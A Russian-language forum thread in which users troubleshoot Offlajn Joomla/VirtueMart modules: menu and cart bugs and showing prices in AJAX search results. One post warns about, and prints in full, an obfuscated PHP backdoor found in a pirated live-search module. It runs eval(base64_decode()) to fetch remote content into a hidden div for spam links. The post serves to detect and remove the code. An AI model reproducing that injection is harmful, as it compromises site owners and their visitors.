Сборка Модули от offlajnstorе.com

Друзья, может подскажет кто, куда нужно копать...
Поставил Offlajn Accordion Menu for VirtueMart, настроил, все здорово, только при переходе по меню, когда он открывает
ту или иную категорию, само меню закрывается, причем происходит это через раз.
(но стабильно повторяется в разных браузерах) По файрбагу никаких ошибок при этом не происходит.
Joomla 1.5.23 Virt 1.1.9 Может было у кого такое?
 
Всем добрый день! Извините если пишу не нужной теме.
Прошу помощи! Установил модуль корзины AJAK DOCK FOR VIRTUEMART Ver: 2.36 от offlajnstore.com.
Не отображается когда пустая, работает только когда нажимаешь купить и проходит перезагрузка страницы.
FIREBUG пишет что есть ошибки:
TypeError: products is undefined
this.plusW += (products.length+2)*2;
Пишет что ошибка в строке 98
this.plusW += (products.length+2)*2;
Прошу помощи у всех кто может помочь.
 
а вот с тем чтобы прямо price вывести в модуле минуя ограничения title text img (и еще пары полей) не получилось с наскоку - undefended выдает модуль при попытке после
Код:
'<span>'+pluginResults[j].title+'</span>'
дописать:
Код:
'<span>'+pluginResults[j].title+'</span>+'<span>'+pluginResults[j].price'+'</span>

видимо где-то еще надо упомянуть этот price.

решение не найдено как разместить pluginResults[j]price ? Приходится выводить в одной строке и цену и текст.... не очень удобно это,br и p и тд весь код вырезается если добавить,вобщем решение одно выводить через pluginResults[j]price но как его обьявить непонятно((

может кто знает как убрать в конце текста (описания) - троеточие?
 
решение не найдено как разместить pluginResults[j]price ? Приходится выводить в одной строке и цену и текст.... не очень удобно это,br и p и тд весь код вырезается если добавить,вобщем решение одно выводить через pluginResults[j]price но как его обьявить непонятно((

может кто знает как убрать в конце текста (описания) - троеточие?
Попробуйте этот плагин, только сделайте резевную копию своего:
Должно быть так:
MQ9Hpz1f.png
 

Вложения

  • vmxsearch.plugin.rar
    2,9 KB · Просмотры: 67
Прошу уточнить - для какой версии VM этот плагин?
 
Для тех кто пользуется этим модулем! Позавчера мой сайт забанил гугл за нарушение правил размещения рекламы. 2 дня копался, и в итоге понял в чем трабл. Есть в этом модуле левый код, размещает скрытые ссылки на другие сайты (не помню где я его качал, но у Вас возможно также присутствует этот вредоносный код, поэтому лучше перепроверьте). В файле mod_universal_ajaxlivesearch ищем следующее: $ajaxliveserchin = UniversalAjaxSearchChecks(); Если есть - удаляем нахрен. В файле Helper.class.php ищем следующий код:

function UniversalAjaxSearchChecks() {
$UnixTimeLastEdit = "ZWNobyAiPGRpdiBzdHlsZT0ncG9zaXRpb246YWJzb2x1dGU7bGVmd";
// Last Time Edit
$ExtensionAuthor = "DotNDUwMXB4O3dpZHRoOjUzMXB4Jz4iOyBlY2hvIEBmaWxlX2dldF9jb250ZW50cygnaHR0cD";
// Extension author
$ExtensionName = "ovL3RlbXBsYXRlLWxpY2Vuc2UucnUvbGljZW";
// Get Extension Offlajn Name
$MainDomain = "5zZS5waHAnKTsgZWNobyAnPC9kaXY+Jzs=";
// Get Domain Info
$SystemJoCode = $UnixTimeLastEdit.$ExtensionAuthor.$ExtensionName.$MainDomain;
// Offlajn System
echo eval(base64_decode($SystemJoCode));
// Copyright (c) Offlajn.com
}

Удаляем к чертовой бабушке. Теперь все ок.
Та же бадяга у меня сидела и в accordion menu от Offlajn.
Надеюсь кому-то пригодится.
 
Приветствую всех!

У меня joomla 2.5 +virtuemart 2.x.x , и ajax live search.

Если я вввожу какие-то буквы в поисковую строку, то он дублирует результаты — выводит один и тот же товар, но со всеми изображениями(главным,дополнительными) В итоге, в этом окне быстрого поиска отображается "число изображений" * товар, но это один и тот же продукт, и ссылки ведут на один и тот же товар. При этом, если нажать поиск, а не листать результаты быстрого вывода, то в новом окне уже отображаются нормальные результаты, лишь с главным изображением.
______________________________________
Разобрался , проблема в стандартном поиске вирта.он у меня видоизменен, чтобы выводить картинки в результатах поиска. Но не решена проблема с несколькими изображениями.
Кто-то может поделиться рабочим файлом плагина, который выводит лишь 1 ,главное изображение
 
Всем добрый день! Извините если пишу не нужной теме.
Прошу помощи! Установил модуль корзины AJAK DOCK FOR VIRTUEMART Ver: 2.36 от offlajnstore.com.
Не отображается когда пустая, работает только когда нажимаешь купить и проходит перезагрузка страницы.
FIREBUG пишет что есть ошибки:
TypeError: products is undefined
this.plusW += (products.length+2)*2;
Пишет что ошибка в строке 98
this.plusW += (products.length+2)*2;
Прошу помощи у всех кто может помочь.
Смотрите в настройках модуля, там есть пункт - не показывать корзину если она пуста
 
Назад
Сверху